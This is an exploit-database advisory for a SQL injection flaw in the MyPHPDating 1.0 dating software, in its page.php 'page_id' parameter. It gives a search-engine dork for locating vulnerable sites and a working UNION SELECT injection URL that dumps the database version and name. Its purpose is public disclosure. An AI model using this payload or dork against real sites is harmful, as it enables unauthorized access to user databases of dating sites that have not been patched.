MyPHPDating 1.0 - SQL Injection Vulnerability



EDB-ID: 18300 CVE: 2009-2436 OSVDB-ID: 55854
Author: ITTIHACK Published: 2012-01-02 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
MyPHPDating 1.0 SQL Injection Vulnerability  \
==============================================\__________________________
       Software : MyPHPDating version 1.0                                \
       Date     : 1/1/2012                                           	  \
       Vendor   : http://www.phponlinedatingsoftware.com/                  \
       Demo     : http://www.phponlinedatingsoftware.com/demo.htm           \
	   Get App. : http://www.phponlinedatingsoftware.com/order.htm           \
       Price    : $149.00	                                                  \
       Dork     : "Powered by MyPHPDating"	                                   \
       Author   : ITTIHACK                                                      \
       Home     : http://ittihack.com                                            \                
==================================================================================                
                                                                                  |_______________________________________|
Vulnerable file : page.php                                                                                                |
Exploit         : http://localhost/[path]/page.php?page_id=[SQL]                                                          |
                  http://localhost/[path]/page.php?page_id=-1+union+select+1,2,3,concat(@@version,0x3c3e,database())--    |
==========================================================================================================================|

 
 Greatz to: Reinie